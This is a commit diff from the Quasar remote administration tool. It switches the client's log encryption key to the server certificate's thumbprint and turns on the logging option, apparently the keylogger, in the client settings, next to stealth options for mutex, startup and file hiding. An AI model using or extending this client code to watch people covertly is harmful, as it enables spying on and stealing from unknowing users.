Use certificate thumbprint as key for client logs

Fixes quasar#778
MasterMann · May 31, 2020 · 28f6cea · 28f6cea
1 parent b9eb679
commit 28f6cea
Show file tree

Hide file tree

Showing 4 changed files with 206 additions and 10 deletions.
diff --git a/Quasar.Client/Config/Settings.cs b/Quasar.Client/Config/Settings.cs
@@ -26,8 +26,8 @@ public static class Settings
         public static string MUTEX = "123AKs82kA,ylAo2kAlUS2kYkala!";
         public static string STARTUPKEY = "Test key";
         public static bool HIDEFILE = false;
-        public static bool ENABLELOGGER = false;
-        public static string ENCRYPTIONKEY = "-.)4>[=u%5G3hY3&";
+        public static bool ENABLELOGGER = true;
+        public static string ENCRYPTIONKEY = "CFCD0759E20F29C399C9D4210BE614E4E020BEE8";
         public static string TAG = "DEBUG";
         public static string LOGDIRECTORYNAME = "Logs";
         public static string SERVERSIGNATURE = "";

diff --git a/Quasar.Server/Build/ClientBuilder.cs b/Quasar.Server/Build/ClientBuilder.cs
@@ -81,12 +81,12 @@ public void Build()
 
         private void WriteSettings(AssemblyDefinition asmDef)
         {
-            var key = StringHelper.GetRandomString(32);
-            var aes = new Aes256(key);
-
             var caCertificate = new X509Certificate2(Settings.CertificatePath, "", X509KeyStorageFlags.Exportable);
             var serverCertificate = new X509Certificate2(caCertificate.Export(X509ContentType.Cert)); // export without private key, very important!
 
+            var key = serverCertificate.Thumbprint;
+            var aes = new Aes256(key);
+
             byte[] signature;
             // https://stackoverflow.com/a/49777672 RSACryptoServiceProvider must be changed with .NET 4.6
             using (var csp = (RSACryptoServiceProvider) caCertificate.PrivateKey)

diff --git a/Quasar.Server/Forms/FrmMain.cs b/Quasar.Server/Forms/FrmMain.cs
@@ -1,8 +1,6 @@
 using Quasar.Common.Enums;
-using Quasar.Common.IO;
 using Quasar.Common.Messages;
 using Quasar.Server.Extensions;
-using Quasar.Server.Helper;
 using Quasar.Server.Messages;
 using Quasar.Server.Models;
 using Quasar.Server.Networking;
@@ -12,11 +10,9 @@
 using System.IO;
 using System.Linq;
 using System.Net.Sockets;
-using System.Security.Cryptography;
 using System.Security.Cryptography.X509Certificates;
 using System.Threading;
 using System.Windows.Forms;
-using Quasar.Common.Cryptography;
 
 namespace Quasar.Server.Forms
 {
@@ -86,7 +82,7 @@ private void InitializeServer()
         {
             X509Certificate2 serverCertificate;
 #if DEBUG
-            serverCertificate = CertificateHelper.CreateCertificateAuthority("Quasar Server CA", 2048);
+            serverCertificate = new DummyCertificate();
 #else
             if (!File.Exists(Settings.CertificatePath))
             {